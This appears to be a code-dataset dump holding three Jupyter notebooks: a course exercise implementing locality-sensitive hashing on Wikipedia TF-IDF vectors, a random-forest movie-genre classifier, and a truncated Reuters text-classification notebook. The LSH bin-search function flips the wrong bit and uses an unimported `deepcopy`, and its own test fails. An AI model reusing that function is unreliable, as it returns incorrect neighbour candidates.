"_____no_output_____" ], [ "", "_____no_output_____" ] ] ]
[ "markdown", "code" ]
[ [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
cb1e317e75698c5e22d8f4ba94a46c23b6d9f2aa
52,131
ipynb
Jupyter Notebook
Machine_Learning_WashingTon/Clustering & Retrieval/week2 nearest neighbors & LSH implementation/Nearest Neighbors LSH Implementation.ipynb
PerpetualSmile/-Coursera
485bed0f2e9026e1d66db12c158890e305c4db3d
[ "MIT" ]
1
2020-12-26T12:06:37.000Z
2020-12-26T12:06:37.000Z
Machine_Learning_WashingTon/Clustering & Retrieval/week2 nearest neighbors & LSH implementation/Nearest Neighbors LSH Implementation.ipynb
PerpetualSmile/Coursera
485bed0f2e9026e1d66db12c158890e305c4db3d
[ "MIT" ]
null
null
null
Machine_Learning_WashingTon/Clustering & Retrieval/week2 nearest neighbors & LSH implementation/Nearest Neighbors LSH Implementation.ipynb
PerpetualSmile/Coursera
485bed0f2e9026e1d66db12c158890e305c4db3d
[ "MIT" ]
null
null
null
26.638222
139
0.415837
[ [ [ "# Locality Sensitive Hashing", "_____no_output_____" ] ], [ [ "import numpy as np\nimport pandas as pd\nfrom scipy.sparse import csr_matrix\nfrom sklearn.metrics.pairwise import pairwise_distances\nimport time\nfrom copy import copy\nimport matplotlib.pyplot as plt\n%matplotlib inline\n\n'''compute norm of a sparse vector\n Thanks to: Jaiyam Sharma'''\ndef norm(x):\n sum_sq=x.dot(x.T)\n norm=np.sqrt(sum_sq)\n return(norm)", "_____no_output_____" ] ], [ [ "## Load in the Wikipedia dataset", "_____no_output_____" ] ], [ [ "wiki = pd.read_csv('people_wiki.csv')", "_____no_output_____" ], [ "wiki.head()", "_____no_output_____" ] ], [ [ "## Extract TF-IDF matrix", "_____no_output_____" ] ], [ [ "def load_sparse_csr(filename):\n loader = np.load(filename)\n data = loader['data']\n indices = loader['indices']\n indptr = loader['indptr']\n shape = loader['shape']\n return csr_matrix((data, indices, indptr), shape)\n\ncorpus = load_sparse_csr('people_wiki_tf_idf.npz')", "_____no_output_____" ], [ "assert corpus.shape == (59071, 547979)\nprint('Check passed correctly!')", "Check passed correctly!\n" ] ], [ [ "## Train an LSH model", "_____no_output_____" ] ], [ [ "def generate_random_vectors(num_vector, dim):\n return np.random.randn(dim, num_vector)", "_____no_output_____" ], [ "# Generate 3 random vectors of dimension 5, arranged into a single 5 x 3 matrix.\nnp.random.seed(0) # set seed=0 for consistent results\ngenerate_random_vectors(num_vector=3, dim=5)", "_____no_output_____" ], [ "# Generate 16 random vectors of dimension 547979\nnp.random.seed(0)\nrandom_vectors = generate_random_vectors(num_vector=16, dim=547979)\nrandom_vectors.shape", "_____no_output_____" ], [ "doc = corpus[0, :] # vector of tf-idf values for document 0\ndoc.dot(random_vectors[:, 0]) >= 0 # True if positive sign; False if negative sign", "_____no_output_____" ], [ "doc.dot(random_vectors[:, 1]) >= 0 # True if positive sign; False if negative sign", "_____no_output_____" ], [ "doc.dot(random_vectors) >= 0 # should return an array of 16 True/False bits", "_____no_output_____" ], [ "np.array(doc.dot(random_vectors) >= 0, dtype=int) # display index bits in 0/1's", "_____no_output_____" ], [ "corpus[0:2].dot(random_vectors) >= 0 # compute bit indices of first two documents", "_____no_output_____" ], [ "corpus.dot(random_vectors) >= 0 # compute bit indices of ALL documents", "_____no_output_____" ], [ "doc = corpus[0, :] # first document\nindex_bits = (doc.dot(random_vectors) >= 0)\npowers_of_two = (1 << np.arange(15, -1, -1))\nprint(index_bits)\nprint(powers_of_two)\nprint(index_bits.dot(powers_of_two))", "[[ True True False False False True True False True True True False\n False True False True]]\n[32768 16384 8192 4096 2048 1024 512 256 128 64 32 16\n 8 4 2 1]\n[50917]\n" ], [ "index_bits = corpus.dot(random_vectors) >= 0\nindex_bits.dot(powers_of_two)", "_____no_output_____" ], [ "def train_lsh(data, num_vector=16, seed=None):\n \n dim = data.shape[1]\n if seed is not None:\n np.random.seed(seed)\n random_vectors = generate_random_vectors(num_vector, dim)\n \n powers_of_two = 1 << np.arange(num_vector-1, -1, -1)\n \n table = {}\n \n # Partition data points into bins\n bin_index_bits = (data.dot(random_vectors) >= 0)\n \n # Encode bin index bits into integers\n bin_indices = bin_index_bits.dot(powers_of_two)\n \n # Update `table` so that `table[i]` is the list of document ids with bin index equal to i.\n for data_index, bin_index in enumerate(bin_indices):\n if bin_index not in table:\n # If no list yet exists for this bin, assign the bin an empty list.\n table[bin_index] = list() # YOUR CODE HERE\n # Fetch the list of document ids associated with the bin and add the document id to the end.\n table[bin_index].append(data_index)# YOUR CODE HERE\n\n model = {'data': data,\n 'bin_index_bits': bin_index_bits,\n 'bin_indices': bin_indices,\n 'table': table,\n 'random_vectors': random_vectors,\n 'num_vector': num_vector}\n \n return model", "_____no_output_____" ], [ "model = train_lsh(corpus, num_vector=16, seed=143)\ntable = model['table']\nif 0 in table and table[0] == [39583] and \\\n 143 in table and table[143] == [19693, 28277, 29776, 30399]:\n print('Passed!')\nelse:\n print('Check your code.')", "Passed!\n" ] ], [ [ "## Inspect bins", "_____no_output_____" ] ], [ [ "wiki[wiki['name'] == 'Barack Obama']", "_____no_output_____" ], [ "print(model['bin_indices'][35817])", "50194\n" ], [ "wiki[wiki['name'] == 'Joe Biden']", "_____no_output_____" ], [ "print(np.array(model['bin_index_bits'][24478], dtype=int)) # list of 0/1's\nprint(model['bin_indices'][24478]) # integer format\nsum(model['bin_index_bits'][24478] == model['bin_index_bits'][35817])", "[1 0 0 0 0 1 0 0 0 0 0 0 0 0 1 0]\n33794\n" ], [ "wiki[wiki['name']=='Wynn Normington Hugh-Jones']", "_____no_output_____" ], [ "print(np.array(model['bin_index_bits'][22745], dtype=int)) # list of 0/1's\nprint(model['bin_indices'][22745])# integer format\nmodel['bin_index_bits'][35817] == model['bin_index_bits'][22745]", "[0 0 0 1 0 0 1 0 0 0 1 1 0 1 0 0]\n4660\n" ], [ "model['table'][model['bin_indices'][35817]]", "_____no_output_____" ], [ "\ndoc_ids = list(model['table'][model['bin_indices'][35817]])\ndoc_ids.remove(35817) # display documents other than Obama\n\ndocs = wiki[wiki.index.isin(doc_ids)]\ndocs", "_____no_output_____" ], [ "def cosine_distance(x, y):\n xy = x.dot(y.T)\n dist = xy/(norm(x)*norm(y))\n return 1-dist[0,0]\n\nobama_tf_idf = corpus[35817,:]\nbiden_tf_idf = corpus[24478,:]\n\nprint('================= Cosine distance from Barack Obama')\nprint('Barack Obama - {0:24s}: {1:f}'.format('Joe Biden',\n cosine_distance(obama_tf_idf, biden_tf_idf)))\nfor doc_id in doc_ids:\n doc_tf_idf = corpus[doc_id,:]\n print('Barack Obama - {0:24s}: {1:f}'.format(wiki.iloc[doc_id]['name'],\n cosine_distance(obama_tf_idf, doc_tf_idf)))", "================= Cosine distance from Barack Obama\nBarack Obama - Joe Biden : 0.703139\nBarack Obama - Mark Boulware : 0.950867\nBarack Obama - John Wells (politician) : 0.975966\nBarack Obama - Francis Longstaff : 0.978256\nBarack Obama - Madurai T. Srinivasan : 0.993092\n" ] ], [ [ "## Query the LSH model", "_____no_output_____" ] ], [ [ "from itertools import combinations", "_____no_output_____" ], [ "num_vector = 16\nsearch_radius = 3\nfor diff in combinations(range(num_vector), search_radius):\n print(diff)", "(0, 1, 2)\n(0, 1, 3)\n(0, 1, 4)\n(0, 1, 5)\n(0, 1, 6)\n(0, 1, 7)\n(0, 1, 8)\n(0, 1, 9)\n(0, 1, 10)\n(0, 1, 11)\n(0, 1, 12)\n(0, 1, 13)\n(0, 1, 14)\n(0, 1, 15)\n(0, 2, 3)\n(0, 2, 4)\n(0, 2, 5)\n(0, 2, 6)\n(0, 2, 7)\n(0, 2, 8)\n(0, 2, 9)\n(0, 2, 10)\n(0, 2, 11)\n(0, 2, 12)\n(0, 2, 13)\n(0, 2, 14)\n(0, 2, 15)\n(0, 3, 4)\n(0, 3, 5)\n(0, 3, 6)\n(0, 3, 7)\n(0, 3, 8)\n(0, 3, 9)\n(0, 3, 10)\n(0, 3, 11)\n(0, 3, 12)\n(0, 3, 13)\n(0, 3, 14)\n(0, 3, 15)\n(0, 4, 5)\n(0, 4, 6)\n(0, 4, 7)\n(0, 4, 8)\n(0, 4, 9)\n(0, 4, 10)\n(0, 4, 11)\n(0, 4, 12)\n(0, 4, 13)\n(0, 4, 14)\n(0, 4, 15)\n(0, 5, 6)\n(0, 5, 7)\n(0, 5, 8)\n(0, 5, 9)\n(0, 5, 10)\n(0, 5, 11)\n(0, 5, 12)\n(0, 5, 13)\n(0, 5, 14)\n(0, 5, 15)\n(0, 6, 7)\n(0, 6, 8)\n(0, 6, 9)\n(0, 6, 10)\n(0, 6, 11)\n(0, 6, 12)\n(0, 6, 13)\n(0, 6, 14)\n(0, 6, 15)\n(0, 7, 8)\n(0, 7, 9)\n(0, 7, 10)\n(0, 7, 11)\n(0, 7, 12)\n(0, 7, 13)\n(0, 7, 14)\n(0, 7, 15)\n(0, 8, 9)\n(0, 8, 10)\n(0, 8, 11)\n(0, 8, 12)\n(0, 8, 13)\n(0, 8, 14)\n(0, 8, 15)\n(0, 9, 10)\n(0, 9, 11)\n(0, 9, 12)\n(0, 9, 13)\n(0, 9, 14)\n(0, 9, 15)\n(0, 10, 11)\n(0, 10, 12)\n(0, 10, 13)\n(0, 10, 14)\n(0, 10, 15)\n(0, 11, 12)\n(0, 11, 13)\n(0, 11, 14)\n(0, 11, 15)\n(0, 12, 13)\n(0, 12, 14)\n(0, 12, 15)\n(0, 13, 14)\n(0, 13, 15)\n(0, 14, 15)\n(1, 2, 3)\n(1, 2, 4)\n(1, 2, 5)\n(1, 2, 6)\n(1, 2, 7)\n(1, 2, 8)\n(1, 2, 9)\n(1, 2, 10)\n(1, 2, 11)\n(1, 2, 12)\n(1, 2, 13)\n(1, 2, 14)\n(1, 2, 15)\n(1, 3, 4)\n(1, 3, 5)\n(1, 3, 6)\n(1, 3, 7)\n(1, 3, 8)\n(1, 3, 9)\n(1, 3, 10)\n(1, 3, 11)\n(1, 3, 12)\n(1, 3, 13)\n(1, 3, 14)\n(1, 3, 15)\n(1, 4, 5)\n(1, 4, 6)\n(1, 4, 7)\n(1, 4, 8)\n(1, 4, 9)\n(1, 4, 10)\n(1, 4, 11)\n(1, 4, 12)\n(1, 4, 13)\n(1, 4, 14)\n(1, 4, 15)\n(1, 5, 6)\n(1, 5, 7)\n(1, 5, 8)\n(1, 5, 9)\n(1, 5, 10)\n(1, 5, 11)\n(1, 5, 12)\n(1, 5, 13)\n(1, 5, 14)\n(1, 5, 15)\n(1, 6, 7)\n(1, 6, 8)\n(1, 6, 9)\n(1, 6, 10)\n(1, 6, 11)\n(1, 6, 12)\n(1, 6, 13)\n(1, 6, 14)\n(1, 6, 15)\n(1, 7, 8)\n(1, 7, 9)\n(1, 7, 10)\n(1, 7, 11)\n(1, 7, 12)\n(1, 7, 13)\n(1, 7, 14)\n(1, 7, 15)\n(1, 8, 9)\n(1, 8, 10)\n(1, 8, 11)\n(1, 8, 12)\n(1, 8, 13)\n(1, 8, 14)\n(1, 8, 15)\n(1, 9, 10)\n(1, 9, 11)\n(1, 9, 12)\n(1, 9, 13)\n(1, 9, 14)\n(1, 9, 15)\n(1, 10, 11)\n(1, 10, 12)\n(1, 10, 13)\n(1, 10, 14)\n(1, 10, 15)\n(1, 11, 12)\n(1, 11, 13)\n(1, 11, 14)\n(1, 11, 15)\n(1, 12, 13)\n(1, 12, 14)\n(1, 12, 15)\n(1, 13, 14)\n(1, 13, 15)\n(1, 14, 15)\n(2, 3, 4)\n(2, 3, 5)\n(2, 3, 6)\n(2, 3, 7)\n(2, 3, 8)\n(2, 3, 9)\n(2, 3, 10)\n(2, 3, 11)\n(2, 3, 12)\n(2, 3, 13)\n(2, 3, 14)\n(2, 3, 15)\n(2, 4, 5)\n(2, 4, 6)\n(2, 4, 7)\n(2, 4, 8)\n(2, 4, 9)\n(2, 4, 10)\n(2, 4, 11)\n(2, 4, 12)\n(2, 4, 13)\n(2, 4, 14)\n(2, 4, 15)\n(2, 5, 6)\n(2, 5, 7)\n(2, 5, 8)\n(2, 5, 9)\n(2, 5, 10)\n(2, 5, 11)\n(2, 5, 12)\n(2, 5, 13)\n(2, 5, 14)\n(2, 5, 15)\n(2, 6, 7)\n(2, 6, 8)\n(2, 6, 9)\n(2, 6, 10)\n(2, 6, 11)\n(2, 6, 12)\n(2, 6, 13)\n(2, 6, 14)\n(2, 6, 15)\n(2, 7, 8)\n(2, 7, 9)\n(2, 7, 10)\n(2, 7, 11)\n(2, 7, 12)\n(2, 7, 13)\n(2, 7, 14)\n(2, 7, 15)\n(2, 8, 9)\n(2, 8, 10)\n(2, 8, 11)\n(2, 8, 12)\n(2, 8, 13)\n(2, 8, 14)\n(2, 8, 15)\n(2, 9, 10)\n(2, 9, 11)\n(2, 9, 12)\n(2, 9, 13)\n(2, 9, 14)\n(2, 9, 15)\n(2, 10, 11)\n(2, 10, 12)\n(2, 10, 13)\n(2, 10, 14)\n(2, 10, 15)\n(2, 11, 12)\n(2, 11, 13)\n(2, 11, 14)\n(2, 11, 15)\n(2, 12, 13)\n(2, 12, 14)\n(2, 12, 15)\n(2, 13, 14)\n(2, 13, 15)\n(2, 14, 15)\n(3, 4, 5)\n(3, 4, 6)\n(3, 4, 7)\n(3, 4, 8)\n(3, 4, 9)\n(3, 4, 10)\n(3, 4, 11)\n(3, 4, 12)\n(3, 4, 13)\n(3, 4, 14)\n(3, 4, 15)\n(3, 5, 6)\n(3, 5, 7)\n(3, 5, 8)\n(3, 5, 9)\n(3, 5, 10)\n(3, 5, 11)\n(3, 5, 12)\n(3, 5, 13)\n(3, 5, 14)\n(3, 5, 15)\n(3, 6, 7)\n(3, 6, 8)\n(3, 6, 9)\n(3, 6, 10)\n(3, 6, 11)\n(3, 6, 12)\n(3, 6, 13)\n(3, 6, 14)\n(3, 6, 15)\n(3, 7, 8)\n(3, 7, 9)\n(3, 7, 10)\n(3, 7, 11)\n(3, 7, 12)\n(3, 7, 13)\n(3, 7, 14)\n(3, 7, 15)\n(3, 8, 9)\n(3, 8, 10)\n(3, 8, 11)\n(3, 8, 12)\n(3, 8, 13)\n(3, 8, 14)\n(3, 8, 15)\n(3, 9, 10)\n(3, 9, 11)\n(3, 9, 12)\n(3, 9, 13)\n(3, 9, 14)\n(3, 9, 15)\n(3, 10, 11)\n(3, 10, 12)\n(3, 10, 13)\n(3, 10, 14)\n(3, 10, 15)\n(3, 11, 12)\n(3, 11, 13)\n(3, 11, 14)\n(3, 11, 15)\n(3, 12, 13)\n(3, 12, 14)\n(3, 12, 15)\n(3, 13, 14)\n(3, 13, 15)\n(3, 14, 15)\n(4, 5, 6)\n(4, 5, 7)\n(4, 5, 8)\n(4, 5, 9)\n(4, 5, 10)\n(4, 5, 11)\n(4, 5, 12)\n(4, 5, 13)\n(4, 5, 14)\n(4, 5, 15)\n(4, 6, 7)\n(4, 6, 8)\n(4, 6, 9)\n(4, 6, 10)\n(4, 6, 11)\n(4, 6, 12)\n(4, 6, 13)\n(4, 6, 14)\n(4, 6, 15)\n(4, 7, 8)\n(4, 7, 9)\n(4, 7, 10)\n(4, 7, 11)\n(4, 7, 12)\n(4, 7, 13)\n(4, 7, 14)\n(4, 7, 15)\n(4, 8, 9)\n(4, 8, 10)\n(4, 8, 11)\n(4, 8, 12)\n(4, 8, 13)\n(4, 8, 14)\n(4, 8, 15)\n(4, 9, 10)\n(4, 9, 11)\n(4, 9, 12)\n(4, 9, 13)\n(4, 9, 14)\n(4, 9, 15)\n(4, 10, 11)\n(4, 10, 12)\n(4, 10, 13)\n(4, 10, 14)\n(4, 10, 15)\n(4, 11, 12)\n(4, 11, 13)\n(4, 11, 14)\n(4, 11, 15)\n(4, 12, 13)\n(4, 12, 14)\n(4, 12, 15)\n(4, 13, 14)\n(4, 13, 15)\n(4, 14, 15)\n(5, 6, 7)\n(5, 6, 8)\n(5, 6, 9)\n(5, 6, 10)\n(5, 6, 11)\n(5, 6, 12)\n(5, 6, 13)\n(5, 6, 14)\n(5, 6, 15)\n(5, 7, 8)\n(5, 7, 9)\n(5, 7, 10)\n(5, 7, 11)\n(5, 7, 12)\n(5, 7, 13)\n(5, 7, 14)\n(5, 7, 15)\n(5, 8, 9)\n(5, 8, 10)\n(5, 8, 11)\n(5, 8, 12)\n(5, 8, 13)\n(5, 8, 14)\n(5, 8, 15)\n(5, 9, 10)\n(5, 9, 11)\n(5, 9, 12)\n(5, 9, 13)\n(5, 9, 14)\n(5, 9, 15)\n(5, 10, 11)\n(5, 10, 12)\n(5, 10, 13)\n(5, 10, 14)\n(5, 10, 15)\n(5, 11, 12)\n(5, 11, 13)\n(5, 11, 14)\n(5, 11, 15)\n(5, 12, 13)\n(5, 12, 14)\n(5, 12, 15)\n(5, 13, 14)\n(5, 13, 15)\n(5, 14, 15)\n(6, 7, 8)\n(6, 7, 9)\n(6, 7, 10)\n(6, 7, 11)\n(6, 7, 12)\n(6, 7, 13)\n(6, 7, 14)\n(6, 7, 15)\n(6, 8, 9)\n(6, 8, 10)\n(6, 8, 11)\n(6, 8, 12)\n(6, 8, 13)\n(6, 8, 14)\n(6, 8, 15)\n(6, 9, 10)\n(6, 9, 11)\n(6, 9, 12)\n(6, 9, 13)\n(6, 9, 14)\n(6, 9, 15)\n(6, 10, 11)\n(6, 10, 12)\n(6, 10, 13)\n(6, 10, 14)\n(6, 10, 15)\n(6, 11, 12)\n(6, 11, 13)\n(6, 11, 14)\n(6, 11, 15)\n(6, 12, 13)\n(6, 12, 14)\n(6, 12, 15)\n(6, 13, 14)\n(6, 13, 15)\n(6, 14, 15)\n(7, 8, 9)\n(7, 8, 10)\n(7, 8, 11)\n(7, 8, 12)\n(7, 8, 13)\n(7, 8, 14)\n(7, 8, 15)\n(7, 9, 10)\n(7, 9, 11)\n(7, 9, 12)\n(7, 9, 13)\n(7, 9, 14)\n(7, 9, 15)\n(7, 10, 11)\n(7, 10, 12)\n(7, 10, 13)\n(7, 10, 14)\n(7, 10, 15)\n(7, 11, 12)\n(7, 11, 13)\n(7, 11, 14)\n(7, 11, 15)\n(7, 12, 13)\n(7, 12, 14)\n(7, 12, 15)\n(7, 13, 14)\n(7, 13, 15)\n(7, 14, 15)\n(8, 9, 10)\n(8, 9, 11)\n(8, 9, 12)\n(8, 9, 13)\n(8, 9, 14)\n(8, 9, 15)\n(8, 10, 11)\n(8, 10, 12)\n(8, 10, 13)\n(8, 10, 14)\n(8, 10, 15)\n(8, 11, 12)\n(8, 11, 13)\n(8, 11, 14)\n(8, 11, 15)\n(8, 12, 13)\n(8, 12, 14)\n(8, 12, 15)\n(8, 13, 14)\n(8, 13, 15)\n(8, 14, 15)\n(9, 10, 11)\n(9, 10, 12)\n(9, 10, 13)\n(9, 10, 14)\n(9, 10, 15)\n(9, 11, 12)\n(9, 11, 13)\n(9, 11, 14)\n(9, 11, 15)\n(9, 12, 13)\n(9, 12, 14)\n(9, 12, 15)\n(9, 13, 14)\n(9, 13, 15)\n(9, 14, 15)\n(10, 11, 12)\n(10, 11, 13)\n(10, 11, 14)\n(10, 11, 15)\n(10, 12, 13)\n(10, 12, 14)\n(10, 12, 15)\n(10, 13, 14)\n(10, 13, 15)\n(10, 14, 15)\n(11, 12, 13)\n(11, 12, 14)\n(11, 12, 15)\n(11, 13, 14)\n(11, 13, 15)\n(11, 14, 15)\n(12, 13, 14)\n(12, 13, 15)\n(12, 14, 15)\n(13, 14, 15)\n" ], [ "def search_nearby_bins(query_bin_bits, table, search_radius=2, initial_candidates=set()):\n \"\"\"\n For a given query vector and trained LSH model, return all candidate neighbors for\n the query among all bins within the given search radius.\n \n Example usage\n -------------\n >>> model = train_lsh(corpus, num_vector=16, seed=143)\n >>> q = model['bin_index_bits'][0] # vector for the first document\n \n >>> candidates = search_nearby_bins(q, model['table'])\n \"\"\"\n num_vector = len(query_bin_bits)\n powers_of_two = 1 << np.arange(num_vector-1, -1, -1)\n \n # Allow the user to provide an initial set of candidates.\n candidate_set = deepcopy(initial_candidates)\n \n for different_bits in combinations(range(num_vector), search_radius): \n # Flip the bits (n_1,n_2,...,n_r) of the query bin to produce a new bit vector.\n ## Hint: you can iterate over a tuple like a list\n alternate_bits = deepcopy(query_bin_bits)\n for i in different_bits:\n alternate_bits[i] = 1-alternate_bits[0] # YOUR CODE HERE \n \n # Convert the new bit vector to an integer index\n nearby_bin = alternate_bits.dot(powers_of_two)\n \n # Fetch the list of documents belonging to the bin indexed by the new bit vector.\n # Then add those documents to candidate_set\n # Make sure that the bin exists in the table!\n # Hint: update() method for sets lets you add an entire list to the set\n if nearby_bin in table:\n candidate_set.update(table[nearby_bin])# YOUR CODE HERE: Update candidate_set with the documents in this bin.\n \n return candidate_set", "_____no_output_____" ], [ "obama_bin_index = model['bin_index_bits'][35817] # bin index of Barack Obama\ncandidate_set = search_nearby_bins(obama_bin_index, model['table'], search_radius=0)\nif candidate_set == set([35817, 21426, 53937, 39426, 50261]):\n print('Passed test')\nelse:\n print('Check your code')\nprint('List of documents in the same bin as Obama: 35817, 21426, 53937, 39426, 50261')", "Passed test\nList of documents in the same bin as Obama: 35817, 21426, 53937, 39426, 50261\n" ], [ "candidate_set = search_nearby_bins(obama_bin_index, model['table'], search_radius=1, initial_candidates=candidate_set)\nif candidate_set == set([39426, 38155, 38412, 28444, 9757, 41631, 39207, 59050, 47773, 53937, 21426, 34547,\n 23229, 55615, 39877, 27404, 33996, 21715, 50261, 21975, 33243, 58723, 35817, 45676,\n 19699, 2804, 20347]):\n print('Passed test')\nelse:\n print('Check your code')", "Check your code\n" ], [ "def query(vec, model, k, max_search_radius):\n \n data = model['data']\n table = model['table']\n random_vectors = model['random_vectors']\n num_vector = random_vectors.shape[1]\n \n \n # Compute bin index for the query vector, in bit representation.\n bin_index_bits = (vec.dot(random_vectors) >= 0).flatten()\n \n # Search nearby bins and collect candidates\n candidate_set = set()\n for search_radius in range(max_search_radius+1):\n candidate_set = search_nearby_bins(bin_index_bits, table, search_radius, initial_candidates=candidate_set)\n \n # Sort candidates by their true distances from the query\n nearest_neighbors = pd.DataFrame({'id':list(candidate_set)})\n candidates = data[np.array(list(candidate_set)),:]\n nearest_neighbors['distance'] = pairwise_distances(candidates, vec, metric='cosine').flatten()\n \n return nearest_neighbors.nsmallest(k,'distance',)[['id','distance']], len(candidate_set)", "_____no_output_____" ], [ "query(corpus[35817,:], model, k=10, max_search_radius=3)", "_____no_output_____" ], [ "query(corpus[35817,:], model, k=10, max_search_radius=3)[0].set_index('id').join(wiki[['name']], how='inner').sort_values('distance')", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code" ] ]
cb1e51ba4ba4f7b49aea3c1ccfc03897cb667ff2
12,145
ipynb
Jupyter Notebook
finalProject/ExampleTextRF.ipynb
Tionick/AppliedDeepLearningClass
3be1bdf666d7c2704284898e9c43ffca1078b61a
[ "MIT" ]
33
2018-06-06T19:38:06.000Z
2021-10-19T13:59:45.000Z
finalProject/ExampleTextRF.ipynb
Tionick/AppliedDeepLearningClass
3be1bdf666d7c2704284898e9c43ffca1078b61a
[ "MIT" ]
null
null
null
finalProject/ExampleTextRF.ipynb
Tionick/AppliedDeepLearningClass
3be1bdf666d7c2704284898e9c43ffca1078b61a
[ "MIT" ]
30
2018-06-06T22:59:15.000Z
2022-01-02T01:18:37.000Z
27.983871
526
0.466529
[ [ [ "import pandas as pd\nimport os\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.preprocessing import MultiLabelBinarizer\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.ensemble import RandomForestRegressor, RandomForestClassifier\nfrom sklearn.metrics import r2_score, roc_auc_score\nfrom sklearn.model_selection import train_test_split", "_____no_output_____" ] ], [ [ "# Read Data", "_____no_output_____" ] ], [ [ "path = ''", "_____no_output_____" ], [ "dataTraining = pd.read_csv(os.path.join(path, 'data', 'dataTraining.csv'), encoding='UTF-8', index_col=0)\ndataTesting = pd.read_csv(os.path.join(path, 'data', 'dataTesting.csv'), encoding='UTF-8', index_col=0)", "_____no_output_____" ], [ "dataTesting.head()", "_____no_output_____" ], [ "dataTesting.head()", "_____no_output_____" ] ], [ [ "# Create count vectorizer with ngrams", "_____no_output_____" ] ], [ [ "vect = CountVectorizer(ngram_range=(1, 2), max_features=1000)\nX_dtm = vect.fit_transform(dataTraining['plot'])\nX_dtm.shape", "_____no_output_____" ], [ "print(vect.get_feature_names()[:50])", "['able', 'able to', 'about', 'about the', 'about to', 'accident', 'across', 'act', 'action', 'actually', 'affair', 'after', 'after the', 'again', 'against', 'against the', 'age', 'agent', 'ago', 'alex', 'alive', 'all', 'all of', 'all the', 'alone', 'along', 'along the', 'along with', 'already', 'also', 'although', 'always', 'america', 'american', 'among', 'an', 'an old', 'and', 'and has', 'and he', 'and her', 'and his', 'and is', 'and she', 'and that', 'and the', 'and their', 'and then', 'and they', 'and when']\n" ] ], [ [ "# Create y", "_____no_output_____" ] ], [ [ "dataTraining['genres'] = dataTraining['genres'].map(lambda x: eval(x))\n\nle = MultiLabelBinarizer()\ny_genres = le.fit_transform(dataTraining['genres'])", "_____no_output_____" ] ], [ [ "# Split train and test", "_____no_output_____" ] ], [ [ "X_train, X_test, y_train_genres, y_test_genres = train_test_split(X_dtm, y_genres, test_size=0.33, random_state=42)", "_____no_output_____" ] ], [ [ "# Train multi-class multi-label model", "_____no_output_____" ] ], [ [ "clf = OneVsRestClassifier(RandomForestClassifier(n_jobs=-1, n_estimators=100, max_depth=10, random_state=42))", "_____no_output_____" ], [ "clf.fit(X_train, y_train_genres)", "_____no_output_____" ], [ "y_pred_genres = clf.predict_proba(X_test)", "_____no_output_____" ], [ "roc_auc_score(y_test_genres, y_pred_genres, average='macro')", "_____no_output_____" ] ], [ [ "# Apply models to kaggle test", "_____no_output_____" ] ], [ [ "X_test_dtm = vect.transform(dataTesting['plot'])\n\ncols = ['p_Action', 'p_Adventure', 'p_Animation', 'p_Biography', 'p_Comedy', 'p_Crime', 'p_Documentary', 'p_Drama', 'p_Family',\n 'p_Fantasy', 'p_Film-Noir', 'p_History', 'p_Horror', 'p_Music', 'p_Musical', 'p_Mystery', 'p_News', 'p_Romance',\n 'p_Sci-Fi', 'p_Short', 'p_Sport', 'p_Thriller', 'p_War', 'p_Western']\n\ny_pred_test_genres = clf.predict_proba(X_test_dtm)\n\npd.DataFrame(y_pred_test_genres, index=dataTesting.index, columns=cols).to_csv('pred_genres_text_RF.csv', index_label='ID')", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code" ] ]
cb1e6eef9508c849c663561d62b96b1593662a35
5,315
ipynb
Jupyter Notebook
Classification_Reuters.ipynb
miguelmalvarez/reuters-tc
950930742c76ea5cac6d2005576ad99c820bafd5
[ "Apache-2.0" ]
7
2016-11-07T14:24:57.000Z
2018-02-10T17:11:17.000Z
Classification_Reuters.ipynb
miguelmalvarez/reuters-tc
950930742c76ea5cac6d2005576ad99c820bafd5
[ "Apache-2.0" ]
null
null
null
Classification_Reuters.ipynb
miguelmalvarez/reuters-tc
950930742c76ea5cac6d2005576ad99c820bafd5
[ "Apache-2.0" ]
null
null
null
34.070513
110
0.61524
[ [ [ "# Classification", "_____no_output_____" ] ], [ [ "from nltk.corpus import reuters\nimport spacy\nimport re\nimport numpy as np\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.preprocessing import MultiLabelBinarizer\nfrom sklearn.svm import LinearSVC\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.metrics import f1_score, precision_score, recall_score\nnlp = spacy.load(\"en_core_web_md\")\n\n\ndef tokenize(text):\n min_length = 3\n tokens = [word.lemma_ for word in nlp(text) if not word.is_stop]\n p = re.compile('[a-zA-Z]+');\n filtered_tokens = list(filter (lambda token: p.match(token) and len(token) >= min_length,tokens))\n return filtered_tokens \n\ndef represent_tfidf(train_docs, test_docs):\n representer = TfidfVectorizer(tokenizer=tokenize)\n # Learn and transform train documents\n vectorised_train_documents = representer.fit_transform(train_docs)\n vectorised_test_documents = representer.transform(test_docs) \n return vectorised_train_documents, vectorised_test_documents\n\ndef doc2vec(text):\n min_length = 3\n p = re.compile('[a-zA-Z]+')\n tokens = [token for token in nlp(text) if not token.is_stop and \n p.match(token.text) and \n len(token.text) >= min_length]\n doc = np.average([token.vector for token in tokens], axis=0)\n return doc\n\ndef represent_doc2vec(train_docs, test_docs):\n vectorised_train_documents = [doc2vec(doc) for doc in train_docs]\n vectorised_test_documents = [doc2vec(doc) for doc in test_docs]\n return vectorised_train_documents, vectorised_test_documents\n\ndef evaluate(test_labels, predictions):\n precision = precision_score(test_labels, predictions, average='micro')\n recall = recall_score(test_labels, predictions, average='micro')\n f1 = f1_score(test_labels, predictions, average='micro')\n print(\"Micro-average quality numbers\")\n print(\"Precision: {:.4f}, Recall: {:.4f}, F1-measure: {:.4f}\".format(precision, recall, f1))\n\n 